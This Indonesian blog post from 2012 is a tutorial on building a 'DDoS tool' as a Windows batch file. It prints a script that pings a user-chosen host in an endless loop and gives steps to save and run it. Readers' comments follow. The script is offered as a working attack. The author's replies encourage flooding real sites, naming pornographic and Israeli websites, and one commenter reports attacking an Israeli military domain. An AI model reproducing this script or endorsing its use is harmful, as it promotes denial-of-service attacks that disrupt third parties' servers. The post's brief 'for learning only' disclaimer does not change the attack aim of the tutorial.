Sunday, 23 December 2012

> > Cara Membuat Tool DDoS Sederhana dari Notepad

52 Cara Membuat Tool DDoS Sederhana dari Notepad

Cara Membuat DDoS Sederhana dari Notepad | Cirebon-Cyber4rt - DDoS merupakan salah satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses.

Cara Membuat Tool DDoS Sederhana dari Notepad
DDos Tools

Dan kali ini saya akan memberikan sebuah tutorial, yaitu cara membuat tools DDoS sederhana dari notepad. Jika kalian penasaran, mari kita simak berikut ini.

1. Buka Notepad
Cara Membuat Tool DDoS Sederhana dari Notepad

2. Masukan Kode Berikut Ini :

@echo off
mode 67,16
title DDOS Attack
color 0a
cls
echo.
echo DDOS With Batchfile
echo.
set /p x=Server-Target:
echo.
ping %x%
@ping.exe 127.0.0.1 -n 5 -w 1000 > nul
goto Next
:Next
echo.
echo.
echo.
set /p m=ip Host:
echo.
set /p n=Packet Size:
echo.
:DDOS
color 0c
echo Attacking Server %m%
ping %m% -i %n% -t >nul
goto DDOS

3. Kemudian Save As...
Cara Membuat Tool DDoS Sederhana dari Notepad

4. Beri nama Tools DDoS.bat - Ubah Save As type: All Files - Save.
Cara Membuat Tool DDoS Sederhana dari Notepad

5. Buka file yang sudah dibuat tadi,

6. Jika berhasil tampilannya akan seperti ini :
Cara Membuat Tool DDoS Sederhana dari Notepad

7. Masukan web target pada kolom yang berkedip
8. Kemudian tekan Enter.

Dengan serangan sederhana ini dan dilakukan secara berulang-ulang, web target akan sedikit lambat jika kita akses. Tutorial ini hanya untuk pembelajaran, jadi jangan disalahgunakan ya :)

Sekian saja postingan saya siang ini tentang Cara Membuat Tool DDoS Sederhana dari Notepad, semoga dapat bemanfaat.

Credits: Binus Hacker


Diposkan oleh: Cirebon-Cyber4rt Pada: Sunday, 23 December 2012

52 comments:

Kumpulan Profil said...

Mas saya udah follow 1056, follow balik ya mas...

Nakusan Bali Technology said...

wahh.. mantep sekali tutorialnya sob.
berarti kita bisa jailin blog orang ya sob?

thanks sob infonya.

Artabez.Cam Berita dan Informasi said...

saya sama sekali tidak mengerti soal komputer..huhuhu
saya nyimak aja ya kawan.

terimakasih tipsnya kawan.

Brebes VS Lamongan said...

trmksi sobat ane coba'y sob. trmkasi sobat dah berbagi pengalaman

ska blogger said...

maen deface, ddos lagi ahh =))

Cirebon-Cyber4rt said...

Nakusan@ kira2 bigtu sob hehee :D

Artabez@ ok sob, silahkan disimak :)

Brebes vs Lamongan@ sama-sama sob.

Ska Blogger@ wkwkwk :p

Patuih d.Silence said...

ngerti2 dikit aku sob.hehehe
ijin nyimak aja ^_^

Riev - Bapo said...

Mantap, mw coba ah.
Kesuwun Um :D

Muhammad Zulfi Rahmanzi said...

COOL...saya sngat berterima kasih atas infonya :D
jnagn lupa kunjung balik sob ke blog saya

Supercoolzz said...

wow hekell..:)
mantap nih anggota cyber4rt.. maju terus ya gan..:)

ahmad rizal samsi said...

[maaf yah, pemahaman b.indo ku masih rendah :] sy bingung dgn kalimat "satu serangan terhadap sebuah komputer atau server didalam sebuah jaringan internet, dengan cara membanjiri lalu lintas host target sehingga sulit untuk diakses."
siapa yg untung, siapa yg rugi?

Cirebon-Cyber4rt said...

Ahmad Rizal Samsi@ maksud kalimat diatas jadi kita mengirim request paket internet control message protocol scara booming, jadi si target dibuat repot dan jika servernya down, maka target sulit diakses/mati total.

sbnernya bnyak untungnya, misalnya buat nyerang web2 blue film atau web israel :)

Reo Adam said...

waduh....bahaya nih :D
klu dipraktekan kena sangsi dari mbah google gak ya gan?

Muro'i El-Barezy said...

wah semoga tidak disalahgunakan nih sob hihi...trims

snutzpark said...

I love Hacking :D

Aditia Novit said...

follback ya sob :)

Sigli Cyber said...

wew,,, macam hacker aja ya sob

cerita anak kost said...

wah terus terang ane kurang paham gan. mungkin karena ga familiar kali ya. tapi makasih ya.

ahmad rizal samsi said...

Cirebon-Cyber4rt@ oo gituh... thenks yah..

4 Cheats | Gudang Cheat Gratis said...

nice sob

Kunjungan Baliknya Selalu Saya Tunggu...

green_asing.arr said...

mas saya dah coba
pas tak enter minta massukan ip host
maksudnya apa ya

Parmanto Tjiam said...

kenapa gak di Ddos pake komputer zombie aja gan, lebih mantab

Fachry Darmawan said...

IP Host'a, Di Isi Pake Apaan ?

Atfa M said...

Gunanya DDOS Apa Gan ? :3

fransiscus xaverius said...

Itu bisa ketauan ga ya IPnya

Dimz Domz said...

harus IP.nya atau langsung http.nya

Muhammad Adam Hasnan said...

@Atfa M : Biar Servernya Down

Anonymous said...

Bisa Gx Attack Kayak Forum Gemscool Gitu??
Ntar Banned IP Gx??

Ari Sandra Putra said...

sob,... cara ngilanginnya gimana sob,..

Anonymous said...

mantap

Nzc 014 said...

cara mengembalikan gimana kak??

Anonymous said...

wahh bwt perang ddos bisa kan gan ?

REGGAEKUH - Download Lagu Reggae, Lirik, dan Video said...

wek wek wek keren deh

lalita esperanza said...

Tob nih tutorialnya mas..
sekalian tanya , tandanya apa ya klo web ybs sedang di serang.?
di situ duruh masukkin nama host..(ini host server website yg akan kita serang ya..?)
(masukking ip yg muncul dari ping ya..?)
terusss disuruh masukkin package, berapa maksimalnya mas..? thanks banget tutorialnya..

Anonymous said...

lg coba serang www.idf.il nih

Abu Fachurie said...

Kalo lg nyerang harus conect internet apa gak usah ya yg lbh efektifnya?? trus Packet Size nya bolehkah diisi brapa aja ?? mksh sebelumnya, maju trus cirebon-cyber4rt.

Cirebon-Cyber4rt said...

Abu Fachurie@ harus online gan, kalo size berapa aja juga bisa, itu saya berikan yg standar :)

makasih supportnya.

Anonymous said...

MANTAPPPPPPPPPPPPP >>>>

Agung Triatmaja said...

Cara nge DDOS site gimana ya sob :D

Agung Triatmaja said...

mantap!!!! THANKS BROO

Anonymous said...

kok antivirusnya marah gan, ini virus ya

Anonymous said...

ip host ?? apa tuh?

cbc_rf said...

oke saya coba gan ^_^

nando ando said...

di suruh minta IP host maksudnya?

ane masih newbie

maruf nugroho said...

-_- g bsa dih gw

maruf nugroho said...

-_- g berhasl

Ikram yusuf said...

Maksudnya web target yg mn agak lambat di akses mas?trus gunanya ini tuk apa?

Dezan Andhika said...

Itu ada input Packet Data
Itu diisi berapa ya sob??

Anonymous said...

gan bisa dijelasin gak dari setiap kata dicodingannya. hehe
biar sekalian ngerti.. :D

Anonymous said...

Ip Host Itu apa gan? Di ane keluar tulisan gitu

muhammad afriyanda said...

kaya apaa mau ane copy tuh script nya gann ?????

muhammad afriyanda said...

Kaga bisa ane copy tuh gann scriptnya ?

Post a Comment